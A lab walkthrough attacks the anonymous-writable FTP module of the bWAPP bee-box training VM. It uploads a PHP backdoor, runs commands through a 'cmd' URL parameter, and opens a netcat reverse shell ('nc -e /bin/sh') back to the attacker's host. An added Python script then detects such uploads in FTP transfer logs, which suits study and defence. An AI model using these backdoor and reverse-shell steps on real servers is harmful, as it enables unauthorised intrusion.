bWAPP (as shipped on the bee-box VM) has an Insecure FTP module that exposes a server misconfiguration: the anonymous FTP user is allowed to write files to the server.
We start by connecting to the remote FTP server with the ftp utility.
sam@ubuntu:~$ ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.1 Server (bee-box) [192.168.56.101]
Name (192.168.56.101:sam): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Man.pdf
-rw-rw-r--   1 root     www-data   462949 Nov  2  2014 Terminator_Salvation.pdf
-rw-rw-r--   1 root     www-data   544600 Nov  2  2014 The_Amazing_Spider-Man.pdf
-rw-rw-r--   1 root     www-data   526187 Nov  2  2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r--   1 root     www-data   756522 Nov  2  2014 The_Dark_Knight_Rises.pdf
-rw-rw-r--   1 root     www-data   618117 Nov  2  2014 The_Incredible_Hulk.pdf
-rw-rw-r--   1 root     www-data  5010042 Nov  2  2014 bWAPP_intro.pdf
226 Transfer complete
ftp> pwd
257 "/" is the current directory
ftp>
Checking for write access
Next we check whether the anonymous user has write access on the FTP server. The simplest test is to 'put' a local file onto the remote server and see whether the transfer is accepted.
ftp> put 1.php 1.php
local: 1.php remote: 1.php
200 PORT command successful
150 Opening BINARY mode data connection for 1.php
226 Transfer complete
34 bytes sent in 0.02 secs (1.3439 kB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      nogroup        34 Feb  4 08:11 1.php
-rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Man.pdf
-rw-rw-r--   1 root     www-data   462949 Nov  2  2014 Terminator_Salvation.pdf
-rw-rw-r--   1 root     www-data   544600 Nov  2  2014 The_Amazing_Spider-Man.pdf
-rw-rw-r--   1 root     www-data   526187 Nov  2  2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r--   1 root     www-data   756522 Nov  2  2014 The_Dark_Knight_Rises.pdf
-rw-rw-r--   1 root     www-data   618117 Nov  2  2014 The_Incredible_Hulk.pdf
-rw-rw-r--   1 root     www-data  5010042 Nov  2  2014 bWAPP_intro.pdf
226 Transfer complete
ftp>
The transfer succeeded, so anonymous write is enabled. The FTP root is "/", which tells us nothing about where (if anywhere) the web server exposes our '1.php' file, so we enumerate the web directories of the remote host with 'dirb'.
sam@ubuntu:~$ dirb http://192.168.56.101

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Feb  4 01:20:40 2020
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/.bash_history (CODE:200|SIZE:83)
+ http://192.168.56.101/crossdomain (CODE:200|SIZE:200)
+ http://192.168.56.101/crossdomain.xml (CODE:200|SIZE:200)
==> DIRECTORY: http://192.168.56.101/drupal/
==> DIRECTORY: http://192.168.56.101/evil/
+ http://192.168.56.101/index (CODE:200|SIZE:45)
+ http://192.168.56.101/index.html (CODE:200|SIZE:588)
==> DIRECTORY: http://192.168.56.101/phpmyadmin/
+ http://192.168.56.101/README (CODE:200|SIZE:2491)
+ http://192.168.56.101/server-status (CODE:200|SIZE:5925)
==> DIRECTORY: http://192.168.56.101/webdav/
dirb finds several directories where our 1.php file might have landed, but the one at the very bottom, the webdav directory, stands out. Browsing to that directory shows our uploaded 1.php listed there.
Because the FTP root and the web-served /webdav/ directory overlap, the file we uploaded as the anonymous user is now executed by the web server as PHP, and we can issue commands to the server through the 1.php backdoor. Let's take a look at what we have with this URL: http://192.168.56.101/webdav/1.php?cmd=id;whoami;uname%20-a
Passing every command through the URL is clumsy; what we want is an interactive shell. So we start a netcat listener and use the backdoor to launch a reverse shell that connects back to us. Our target URL will be http://192.168.56.101/webdav/1.php?cmd=nc -e /bin/sh 192.168.56.1 8088
sam@ubuntu:~$ nc -nvlp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 50804 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The connection comes back and we have a system shell running as the web server user, www-data. The root cause is the combination of two settings: anonymous write enabled in ProFTPD, and an FTP directory that is also served (and executed as PHP) by the web server.
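From the defender's side, the chain above leaves a clear trace in the FTP transfer log: an anonymous, inbound, completed transfer of a server-side-executable file into a web-served directory. The following script is an added example (not part of the original post or of bWAPP) that parses wu-ftpd/ProFTPD style xferlog lines and flags exactly that pattern. The document roots in WEB_ROOTS, the log lines, the remote host and the anonymous "password" username are all constructed for the example; on a real server you would point WEB_ROOTS at your own web and WebDAV directories and feed it the live xferlog.

```python
"""Flag anonymous FTP uploads that land in web-served directories.

Input is the wu-ftpd/ProFTPD xferlog format, one transfer per line:
  <date> <secs> <host> <bytes> <path> <a|b> <_|C|U|T> <i|o|d> <a|g|r>
  <user> <service> <0|1> <auth-user> <c|i>
where direction 'i' = upload, access-mode 'a' = anonymous, status 'c' = complete.
"""
import re
from dataclasses import dataclass

# ASSUMPTION: directories the web server serves from. On bee-box the FTP
# root overlapped the /webdav/ web path; these paths are made up for the example.
WEB_ROOTS = ("/var/www/",)
# Extensions the web server would execute rather than serve as static content.
EXECUTABLE_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl", ".py", ".sh")

XFERLOG_RE = re.compile(
    r"^(?P<when>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) "
    r"(?P<secs>\d+) (?P<host>\S+) (?P<size>\d+) (?P<path>\S+) "
    r"(?P<ttype>[ab]) (?P<action>[_CUT]) (?P<dir>[iod]) "
    r"(?P<mode>[agr]) (?P<user>\S+) (?P<service>\S+) "
    r"(?P<auth>[01]) (?P<auth_user>\S+) (?P<status>[ci])$"
)


@dataclass
class Transfer:
    when: str
    host: str
    path: str
    direction: str   # i = upload, o = download, d = delete
    access_mode: str  # a = anonymous, g = guest, r = real user
    user: str
    status: str      # c = complete, i = incomplete


def parse_xferlog_line(line):
    """Return a Transfer for a well-formed xferlog line, else None."""
    m = XFERLOG_RE.match(line.strip())
    if not m:
        return None
    return Transfer(m["when"], m["host"], m["path"], m["dir"],
                    m["mode"], m["user"], m["status"])


def is_web_served(path):
    return any(path.startswith(root) for root in WEB_ROOTS)


def is_executable(path):
    return path.lower().endswith(EXECUTABLE_EXT)


def suspicious_uploads(lines):
    """Completed anonymous uploads of executable files into a web root."""
    hits = []
    for line in lines:
        t = parse_xferlog_line(line)
        if t is None:
            continue  # unparseable line: skip rather than crash the sweep
        if (t.access_mode == "a" and t.direction == "i" and t.status == "c"
                and is_web_served(t.path) and is_executable(t.path)):
            hits.append(t)
    return hits


# Constructed sample log; only the first line should be flagged:
# line 2 is a download, line 3 is not executable, line 4 is a real user
# outside the web root, line 5 never completed.
SAMPLE_XFERLOG = """\
Tue Feb  4 08:11:02 2020 1 192.168.56.1 34 /var/www/webdav/1.php b _ i a mozilla@ ftp 0 * c
Tue Feb  4 08:12:10 2020 3 192.168.56.1 543803 /var/www/webdav/Iron_Man.pdf b _ o a mozilla@ ftp 0 * c
Tue Feb  4 08:13:44 2020 1 192.168.56.1 120 /var/www/webdav/notes.txt b _ i a mozilla@ ftp 0 * c
Tue Feb  4 08:14:00 2020 2 10.0.0.5 812 /home/bee/deploy.php b _ i r bee ftp 0 * c
Tue Feb  4 08:15:31 2020 1 192.168.56.1 34 /var/www/webdav/2.php b _ i a mozilla@ ftp 0 * i
"""

if __name__ == "__main__":
    for t in suspicious_uploads(SAMPLE_XFERLOG.splitlines()):
        print(f"ALERT {t.when}: anonymous upload from {t.host} -> {t.path}")
```

The filter is deliberately narrow (anonymous, inbound, completed, executable extension, under a web root) so that it fires on the write-plus-execute overlap rather than on every anonymous upload; widen it to all inbound anonymous transfers if your policy is that anonymous write should never succeed at all.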